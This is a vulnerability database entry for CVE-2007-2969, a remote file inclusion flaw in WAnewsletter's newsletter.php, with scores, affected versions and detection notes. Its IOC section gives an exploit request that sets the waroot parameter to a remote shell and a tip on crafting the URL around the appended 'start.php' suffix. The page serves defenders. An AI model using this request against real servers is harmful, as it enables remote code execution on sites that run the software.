cbcvebase.
CVE-2007-2969
published 2007-06-01

CVE-2007-2969: PHP remote file inclusion vulnerability in newsletter.php in WAnewsletter 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in…

PriorityP259high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
61.73%
99.1th percentile
PHP remote file inclusion vulnerability in newsletter.php in WAnewsletter 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the waroot parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
wanewsletterwanewsletter<= 2.1.3

Detection & IOCsextracted from sources · hover to see the quote

path/newsletter/newsletter.php
urlhttp://script.emanual.ru/get?i=1053
command[Path]/newsletter/newsletter.php?waroot=shell
  • Monitor HTTP requests targeting newsletter.php with a URL-like or remote path value in the 'waroot' GET parameter, indicating remote file inclusion attempt.
  • The vulnerable code sink is a require_once() call using the unsanitized waroot parameter; look for waroot values containing 'http://' or 'https://' in web server logs.
  • ·The exploit payload appends 'start.php' to the attacker-supplied waroot value, so the remote shell URL must be crafted to account for this suffix (e.g., using a null byte or query string terminator).
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.